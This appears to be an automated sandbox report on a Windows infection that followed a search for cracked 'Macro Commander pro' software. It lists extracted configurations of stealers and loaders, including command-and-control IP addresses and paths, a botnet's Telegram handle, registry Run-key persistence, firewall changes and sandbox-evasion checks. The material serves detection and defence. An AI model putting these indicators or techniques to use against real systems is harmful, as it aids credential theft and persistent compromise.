amadey | hxxps://www[.]google[.]com/search?q=Macro+Commander+pro+crack&rlz=1C1VDKB_enUS1093US1093&oq=Macro+Commander+pro+crack&gs_lcrp=EgZjaHJvbWUyBggAEEUYOTIKCAEQABiABBiiBDIKCAIQABiABBiiBDIKCAMQABiABBiiBNIBCDI4NjNqMGo3qAIAsAIA&sourceid=chrome&ie=UTF-8

Analysis

max time kernel
498s
max time network
671s
platform
windows10-2004_x64
resource
win10v2004-20240709-en
resource tags

arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
submitted
20-07-2024 01:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://www.google.com/search?q=Macro+Commander+pro+crack&rlz=1C1VDKB_enUS1093US1093&oq=Macro+Commander+pro+crack&gs_lcrp=EgZjaHJvbWUyBggAEEUYOTIKCAEQABiABBiiBDIKCAIQABiABBiiBDIKCAMQABiABBiiBNIBCDI4NjNqMGo3qAIAsAIA&sourceid=chrome&ie=UTF-8

Score

10^/10

amadey privateloader redline risepro stealc tofsee 4dd39d default logsdiller cloud (tg: @logsdillabot)discovery evasion execution infostealer loader persistence spyware stealer themida trojan

Malware Config

Extracted

Family

stealc

Botnet

default

http://85.28.47.31

Attributes

url_path
/5499d72b3a3e55be.php

Extracted

Family

amadey

Version

4.30

Botnet

4dd39d

http://77.91.77.82

Attributes

install_dir
ad40971b6b
install_file
explorti.exe
strings_key
a434973ad22def7137dbb5e059b7081e
url_paths
/Hun4Ko/index.php

rc4.plain

Extracted

Family

risepro

194.110.13.70

77.105.133.27

Extracted

Family

redline

Botnet

LogsDiller Cloud (TG: @logsdillabot)

77.105.135.107:3445

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey

Modifies firewall policy service 3 TTPs 1 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

Processes:

setup.exe

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1"	setup.exe

PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
loader privateloader
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/4060-5099-0x0000000000400000-0x0000000000450000-memory.dmp	family_redline

RisePro
RisePro stealer is an infostealer distributed by PrivateLoader.
stealer risepro
Stealc
Stealc is an infostealer written in C++.
stealer stealc
Tofsee
Backdoor/botnet which carries out malicious activities based on commands from a C2 server.
trojan tofsee

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

i_FDKb20r68Kq5b1UGVjTOdQ.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	i_FDKb20r68Kq5b1UGVjTOdQ.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.EXE

pid	Process
7772	powershell.exe
1820	powershell.exe
3500	powershell.EXE

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

Processes:

netsh.exe

pid	Process
4360	netsh.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

i_FDKb20r68Kq5b1UGVjTOdQ.exe

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	i_FDKb20r68Kq5b1UGVjTOdQ.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	i_FDKb20r68Kq5b1UGVjTOdQ.exe

Checks computer location settings 2 TTPs 6 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Setup.exeNW_store.exeNW_store.exeNW_store.exePcAppStore.exesetup.exe

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\Control Panel\International\Geo\Nation	Setup.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\Control Panel\International\Geo\Nation	NW_store.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\Control Panel\International\Geo\Nation	NW_store.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\Control Panel\International\Geo\Nation	NW_store.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\Control Panel\International\Geo\Nation	PcAppStore.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\Control Panel\International\Geo\Nation	setup.exe

Drops startup file 1 IoCs

Processes:

i_FDKb20r68Kq5b1UGVjTOdQ.exe

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PowerExpertNT.lnk	i_FDKb20r68Kq5b1UGVjTOdQ.exe

Executes dropped EXE 34 IoCs

Processes:

Setup.exensk3522.tmpPcAppStore.exeWatchdog.exeNW_store.exeNW_store.exeNW_store.exeNW_store.exeNW_store.exeNW_store.exeNW_store.exeNW_store.exeNW_store.exeNW_store.exeNW_store.exesetup.exesetup.exesetup.exemMHtqlw2y9VvLEc7BbWJFg5o.exe6LbXhRGgLiwBMQpjvYx2XC0y.exei_FDKb20r68Kq5b1UGVjTOdQ.exeP1qvfDqMz6uu9mjPhx4Any0y.exeHkT0EIZ9dn4VMd5PAeOMPahZ.exeB66QqW0nXeI6UMZBjMSMmjq4.exeyf5nxG49AzujxQA4_12jEqGY.exe7V3HZIzzI7EvdsS6nLiKgXtE.exeX0W5QTu6WhR5eXWulFNMZLZP.exe_HNhcPFSY_dFjAHZPuGOzxIN.exeegTQgQNB2JbPhVjfUa3ZuJYX.exe6LbXhRGgLiwBMQpjvYx2XC0y.tmpInstall.exeaudiooutputswitcher32_64.exeInstall.exeaudiooutputswitcher32_64.exe

pid	Process
4196	Setup.exe
1408	nsk3522.tmp
3288	PcAppStore.exe
3340	Watchdog.exe
2692	NW_store.exe
3204	NW_store.exe
5172	NW_store.exe
5180	NW_store.exe
5188	NW_store.exe
5688	NW_store.exe
5924	NW_store.exe
5960	NW_store.exe
5040	NW_store.exe
5108	NW_store.exe
4280	NW_store.exe
1552	setup.exe
3056	setup.exe
4912	setup.exe
1832	mMHtqlw2y9VvLEc7BbWJFg5o.exe
4656	6LbXhRGgLiwBMQpjvYx2XC0y.exe
5012	i_FDKb20r68Kq5b1UGVjTOdQ.exe
1244	P1qvfDqMz6uu9mjPhx4Any0y.exe
5620	HkT0EIZ9dn4VMd5PAeOMPahZ.exe
6284	B66QqW0nXeI6UMZBjMSMmjq4.exe
4148	yf5nxG49AzujxQA4_12jEqGY.exe
4416	7V3HZIzzI7EvdsS6nLiKgXtE.exe
3824	X0W5QTu6WhR5eXWulFNMZLZP.exe
540	_HNhcPFSY_dFjAHZPuGOzxIN.exe
2092	egTQgQNB2JbPhVjfUa3ZuJYX.exe
4652	6LbXhRGgLiwBMQpjvYx2XC0y.tmp
5764	Install.exe
7100	audiooutputswitcher32_64.exe
1248	Install.exe
6320	audiooutputswitcher32_64.exe

Loads dropped DLL 57 IoCs

Processes:

Setup.exensk3522.tmpNW_store.exeNW_store.exeNW_store.exeNW_store.exeNW_store.exeNW_store.exeNW_store.exeNW_store.exeNW_store.exeNW_store.exeNW_store.exe6LbXhRGgLiwBMQpjvYx2XC0y.tmp

pid	Process
4196	Setup.exe
4196	Setup.exe
4196	Setup.exe
4196	Setup.exe
4196	Setup.exe
4196	Setup.exe
4196	Setup.exe
4196	Setup.exe
4196	Setup.exe
4196	Setup.exe
1408	nsk3522.tmp
1408	nsk3522.tmp
1408	nsk3522.tmp
1408	nsk3522.tmp
1408	nsk3522.tmp
1408	nsk3522.tmp
1408	nsk3522.tmp
1408	nsk3522.tmp
1408	nsk3522.tmp
2692	NW_store.exe
2692	NW_store.exe
2692	NW_store.exe
3204	NW_store.exe
5180	NW_store.exe
5172	NW_store.exe
5180	NW_store.exe
5172	NW_store.exe
5172	NW_store.exe
5180	NW_store.exe
5172	NW_store.exe
5172	NW_store.exe
5172	NW_store.exe
5188	NW_store.exe
5188	NW_store.exe
5188	NW_store.exe
5172	NW_store.exe
5688	NW_store.exe
5688	NW_store.exe
5688	NW_store.exe
5688	NW_store.exe
5924	NW_store.exe
5924	NW_store.exe
5924	NW_store.exe
5960	NW_store.exe
5960	NW_store.exe
5960	NW_store.exe
5040	NW_store.exe
5108	NW_store.exe
5108	NW_store.exe
5040	NW_store.exe
5108	NW_store.exe
5040	NW_store.exe
4280	NW_store.exe
4280	NW_store.exe
4280	NW_store.exe
4280	NW_store.exe
4652	6LbXhRGgLiwBMQpjvYx2XC0y.tmp

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Themida packer 3 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
behavioral1/files/0x0008000000023936-3400.dat	themida
behavioral1/memory/5012-3532-0x0000000000660000-0x0000000000FEF000-memory.dmp	themida
behavioral1/memory/5012-4951-0x0000000000660000-0x0000000000FEF000-memory.dmp	themida

Unexpected DNS network traffic destination 1 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

Processes:

description	ioc
Destination IP	45.155.250.90

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

nsk3522.tmpi_FDKb20r68Kq5b1UGVjTOdQ.exe

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PCAppStore = "\"C:\\Users\\Admin\\PCAppStore\\PCAppStore.exe\" /init default"	nsk3522.tmp
Set value (str)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PcAppStoreUpdater = "\"C:\\Users\\Admin\\PCAppStore\\AutoUpdater.exe\" /i"	nsk3522.tmp
Set value (str)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Watchdog = "\"C:\\Users\\Admin\\PCAppStore\\Watchdog.exe\" /guid=1D0C136D-D77C-4455-9382-3336E2DF950BX /rid=20240720013647.848240748640 /ver=fa.1091q"	nsk3522.tmp
Set value (str)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ExtreamFanV5 = "C:\\Users\\Admin\\AppData\\Local\\ExtreamFanV5\\ExtreamFanV5.exe"	i_FDKb20r68Kq5b1UGVjTOdQ.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

i_FDKb20r68Kq5b1UGVjTOdQ.exe

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	i_FDKb20r68Kq5b1UGVjTOdQ.exe

Enumerates connected drives 3 TTPs 1 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

PcAppStore.exe

description	ioc	Process
File opened (read-only)	\??\F:	PcAppStore.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs

Web Service

T1102

Processes:

flow	ioc
678	drive.google.com
679	drive.google.com
961	iplogger.org
962	iplogger.org
676	drive.google.com

Looks up external IP address via web service 4 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
918	api.myip.com
919	api.myip.com
921	ipinfo.io
922	ipinfo.io

Power Settings 1 TTPs 8 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

Processes:

powercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exe

pid	Process
6472	powercfg.exe
1964	powercfg.exe
6876	powercfg.exe
5436	powercfg.exe
744	powercfg.exe
1628	powercfg.exe
6216	powercfg.exe
4352	powercfg.exe

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

Processes:

resource	yara_rule
behavioral1/files/0x00080000000237e0-4180.dat	autoit_exe

Checks system information in the registry 2 TTPs 2 IoCs

System information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

NW_store.exe

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName	NW_store.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer	NW_store.exe

Drops file in System32 directory 8 IoCs

Processes:

setup.exechrome.exeNW_store.exe

description	ioc	Process
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	setup.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	setup.exe
File created	C:\Windows\System32\DriverStore\FileRepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF	chrome.exe
File created	\??\c:\windows\system32\driverstore\filerepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF	chrome.exe
File created	C:\Windows\System32\DriverStore\FileRepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF	NW_store.exe
File created	\??\c:\windows\system32\driverstore\filerepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF	NW_store.exe
File opened for modification	C:\Windows\System32\GroupPolicy	setup.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	setup.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

i_FDKb20r68Kq5b1UGVjTOdQ.exe

pid	Process
5012	i_FDKb20r68Kq5b1UGVjTOdQ.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

HkT0EIZ9dn4VMd5PAeOMPahZ.exemMHtqlw2y9VvLEc7BbWJFg5o.exeegTQgQNB2JbPhVjfUa3ZuJYX.exe

description	pid	Process	procid_target
PID 5620 set thread context of 3680	5620	HkT0EIZ9dn4VMd5PAeOMPahZ.exe	240
PID 1832 set thread context of 5432	1832	mMHtqlw2y9VvLEc7BbWJFg5o.exe	247
PID 2092 set thread context of 5856	2092	egTQgQNB2JbPhVjfUa3ZuJYX.exe	252

Launches sc.exe 7 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid	Process
6952	sc.exe
5404	sc.exe
2248	sc.exe
2280	sc.exe
4300	sc.exe
6748	sc.exe
6188	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 4 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	Process	procid_target
632	4804	WerFault.exe	348
6352	7312	WerFault.exe	388
1220	1248	WerFault.exe	250
6808	4588	WerFault.exe	463

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

P1qvfDqMz6uu9mjPhx4Any0y.exe

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	P1qvfDqMz6uu9mjPhx4Any0y.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	P1qvfDqMz6uu9mjPhx4Any0y.exe

Delays execution with timeout.exe 3 IoCs

evasion

Processes:

timeout.exetimeout.exetimeout.exe

pid	Process
6424	timeout.exe
8160	timeout.exe
4780	timeout.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

NW_store.exechrome.exe

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	NW_store.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	NW_store.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	NW_store.exe

Modifies data under HKEY_USERS 3 IoCs

Processes:

chrome.exeNW_store.exe

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133659128847224268"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	NW_store.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe

Modifies registry class 2 IoCs

Processes:

chrome.exechrome.exe

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings	chrome.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2636447293-1148739154-93880854-1000\{CE2DA15E-6F6E-4CE5-B8A7-5904689B5174}	chrome.exe

NTFS ADS 1 IoCs

Processes:

NW_store.exe

description	ioc	Process
File created	C:\Users\Admin\PCAppStore\assets\images\css2?family=Inter:wght@400;500;600;700&family=Open+Sans:wght@400;600;700&family=Roboto:wght@400;500;700&display=swap	NW_store.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 12 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	Process
7048	schtasks.exe
7116	schtasks.exe
4912	schtasks.exe
6688	schtasks.exe
7608	schtasks.exe
1964	schtasks.exe
5412	schtasks.exe
5936	schtasks.exe
1740	schtasks.exe
6472	schtasks.exe
2240	schtasks.exe
2092	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

chrome.exeSetup.exensk3522.tmpchrome.exePcAppStore.exeWatchdog.exeNW_store.exeNW_store.exeNW_store.exesetup.exesetup.exesetup.exei_FDKb20r68Kq5b1UGVjTOdQ.exeMSBuild.exe

pid	Process
4932	chrome.exe
4932	chrome.exe
4196	Setup.exe
4196	Setup.exe
4196	Setup.exe
4196	Setup.exe
4196	Setup.exe
4196	Setup.exe
4196	Setup.exe
4196	Setup.exe
1408	nsk3522.tmp
1408	nsk3522.tmp
1408	nsk3522.tmp
1408	nsk3522.tmp
1408	nsk3522.tmp
1408	nsk3522.tmp
4992	chrome.exe
4992	chrome.exe
4992	chrome.exe
4992	chrome.exe
3288	PcAppStore.exe
3288	PcAppStore.exe
3288	PcAppStore.exe
3288	PcAppStore.exe
3340	Watchdog.exe
3340	Watchdog.exe
3340	Watchdog.exe
3340	Watchdog.exe
3288	PcAppStore.exe
3288	PcAppStore.exe
3204	NW_store.exe
3204	NW_store.exe
3204	NW_store.exe
3204	NW_store.exe
2692	NW_store.exe
2692	NW_store.exe
3288	PcAppStore.exe
3288	PcAppStore.exe
3288	PcAppStore.exe
3288	PcAppStore.exe
4280	NW_store.exe
4280	NW_store.exe
4280	NW_store.exe
4280	NW_store.exe
3340	Watchdog.exe
3340	Watchdog.exe
3340	Watchdog.exe
3340	Watchdog.exe
1552	setup.exe
1552	setup.exe
1552	setup.exe
1552	setup.exe
3056	setup.exe
3056	setup.exe
3056	setup.exe
3056	setup.exe
4912	setup.exe
4912	setup.exe
4912	setup.exe
4912	setup.exe
5012	i_FDKb20r68Kq5b1UGVjTOdQ.exe
5012	i_FDKb20r68Kq5b1UGVjTOdQ.exe
3680	MSBuild.exe
3680	MSBuild.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

PcAppStore.exe

pid	Process
3288	PcAppStore.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 58 IoCs

Processes:

chrome.exe

pid	Process
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

chrome.exe

description	pid	Process
Token: SeShutdownPrivilege	4932	chrome.exe
Token: SeCreatePagefilePrivilege	4932	chrome.exe
Token: SeShutdownPrivilege	4932	chrome.exe
Token: SeCreatePagefilePrivilege	4932	chrome.exe
Token: SeShutdownPrivilege	4932	chrome.exe
Token: SeCreatePagefilePrivilege	4932	chrome.exe
Token: SeShutdownPrivilege	4932	chrome.exe
Token: SeCreatePagefilePrivilege	4932	chrome.exe
Token: SeShutdownPrivilege	4932	chrome.exe
Token: SeCreatePagefilePrivilege	4932	chrome.exe
Token: SeShutdownPrivilege	4932	chrome.exe
Token: SeCreatePagefilePrivilege	4932	chrome.exe
Token: SeShutdownPrivilege	4932	chrome.exe
Token: SeCreatePagefilePrivilege	4932	chrome.exe
Token: SeShutdownPrivilege	4932	chrome.exe
Token: SeCreatePagefilePrivilege	4932	chrome.exe
Token: SeShutdownPrivilege	4932	chrome.exe
Token: SeCreatePagefilePrivilege	4932	chrome.exe
Token: SeShutdownPrivilege	4932	chrome.exe
Token: SeCreatePagefilePrivilege	4932	chrome.exe
Token: SeShutdownPrivilege	4932	chrome.exe
Token: SeCreatePagefilePrivilege	4932	chrome.exe
Token: SeShutdownPrivilege	4932	chrome.exe
Token: SeCreatePagefilePrivilege	4932	chrome.exe
Token: SeShutdownPrivilege	4932	chrome.exe
Token: SeCreatePagefilePrivilege	4932	chrome.exe
Token: SeShutdownPrivilege	4932	chrome.exe
Token: SeCreatePagefilePrivilege	4932	chrome.exe
Token: SeShutdownPrivilege	4932	chrome.exe
Token: SeCreatePagefilePrivilege	4932	chrome.exe
Token: SeShutdownPrivilege	4932	chrome.exe
Token: SeCreatePagefilePrivilege	4932	chrome.exe
Token: SeShutdownPrivilege	4932	chrome.exe
Token: SeCreatePagefilePrivilege	4932	chrome.exe
Token: SeShutdownPrivilege	4932	chrome.exe
Token: SeCreatePagefilePrivilege	4932	chrome.exe
Token: SeShutdownPrivilege	4932	chrome.exe
Token: SeCreatePagefilePrivilege	4932	chrome.exe
Token: SeShutdownPrivilege	4932	chrome.exe
Token: SeCreatePagefilePrivilege	4932	chrome.exe
Token: SeShutdownPrivilege	4932	chrome.exe
Token: SeCreatePagefilePrivilege	4932	chrome.exe
Token: SeShutdownPrivilege	4932	chrome.exe
Token: SeCreatePagefilePrivilege	4932	chrome.exe
Token: SeShutdownPrivilege	4932	chrome.exe
Token: SeCreatePagefilePrivilege	4932	chrome.exe
Token: SeShutdownPrivilege	4932	chrome.exe
Token: SeCreatePagefilePrivilege	4932	chrome.exe
Token: SeShutdownPrivilege	4932	chrome.exe
Token: SeCreatePagefilePrivilege	4932	chrome.exe
Token: SeShutdownPrivilege	4932	chrome.exe
Token: SeCreatePagefilePrivilege	4932	chrome.exe
Token: SeShutdownPrivilege	4932	chrome.exe
Token: SeCreatePagefilePrivilege	4932	chrome.exe
Token: SeShutdownPrivilege	4932	chrome.exe
Token: SeCreatePagefilePrivilege	4932	chrome.exe
Token: SeShutdownPrivilege	4932	chrome.exe
Token: SeCreatePagefilePrivilege	4932	chrome.exe
Token: SeShutdownPrivilege	4932	chrome.exe
Token: SeCreatePagefilePrivilege	4932	chrome.exe
Token: SeShutdownPrivilege	4932	chrome.exe
Token: SeCreatePagefilePrivilege	4932	chrome.exe
Token: SeShutdownPrivilege	4932	chrome.exe
Token: SeCreatePagefilePrivilege	4932	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

chrome.exePcAppStore.exeNW_store.exe

pid	Process
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
3288	PcAppStore.exe
3288	PcAppStore.exe
3288	PcAppStore.exe
2692	NW_store.exe
2692	NW_store.exe
2692	NW_store.exe
2692	NW_store.exe
2692	NW_store.exe
2692	NW_store.exe
2692	NW_store.exe
2692	NW_store.exe
2692	NW_store.exe
2692	NW_store.exe
2692	NW_store.exe
2692	NW_store.exe
2692	NW_store.exe
2692	NW_store.exe
2692	NW_store.exe
2692	NW_store.exe
3288	PcAppStore.exe
3288	PcAppStore.exe
2692	NW_store.exe
2692	NW_store.exe
2692	NW_store.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe

Suspicious use of SendNotifyMessage 28 IoCs

Processes:

chrome.exePcAppStore.exe

pid	Process
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
4932	chrome.exe
3288	PcAppStore.exe
3288	PcAppStore.exe
3288	PcAppStore.exe
3288	PcAppStore.exe

Suspicious use of SetWindowsHookEx 27 IoCs

Processes:

PcAppStore.exesetup.exesetup.exesetup.exe6LbXhRGgLiwBMQpjvYx2XC0y.exei_FDKb20r68Kq5b1UGVjTOdQ.exeP1qvfDqMz6uu9mjPhx4Any0y.exeB66QqW0nXeI6UMZBjMSMmjq4.exeyf5nxG49AzujxQA4_12jEqGY.exe7V3HZIzzI7EvdsS6nLiKgXtE.exe6LbXhRGgLiwBMQpjvYx2XC0y.tmpMSBuild.exeInstall.exeX0W5QTu6WhR5eXWulFNMZLZP.exeMSBuild.exeegTQgQNB2JbPhVjfUa3ZuJYX.exeaudiooutputswitcher32_64.exeInstall.exeaudiooutputswitcher32_64.exeRegAsm.exe

pid	Process
3288	PcAppStore.exe
3288	PcAppStore.exe
3288	PcAppStore.exe
3288	PcAppStore.exe
3288	PcAppStore.exe
3288	PcAppStore.exe
3288	PcAppStore.exe
1552	setup.exe
3056	setup.exe
4912	setup.exe
4656	6LbXhRGgLiwBMQpjvYx2XC0y.exe
5012	i_FDKb20r68Kq5b1UGVjTOdQ.exe
1244	P1qvfDqMz6uu9mjPhx4Any0y.exe
6284	B66QqW0nXeI6UMZBjMSMmjq4.exe
4148	yf5nxG49AzujxQA4_12jEqGY.exe
1244	P1qvfDqMz6uu9mjPhx4Any0y.exe
4416	7V3HZIzzI7EvdsS6nLiKgXtE.exe
4652	6LbXhRGgLiwBMQpjvYx2XC0y.tmp
3680	MSBuild.exe
5764	Install.exe
3824	X0W5QTu6WhR5eXWulFNMZLZP.exe
5432	MSBuild.exe
2092	egTQgQNB2JbPhVjfUa3ZuJYX.exe
7100	audiooutputswitcher32_64.exe
1248	Install.exe
6320	audiooutputswitcher32_64.exe
5856	RegAsm.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

chrome.exe

description	pid	Process	procid_target
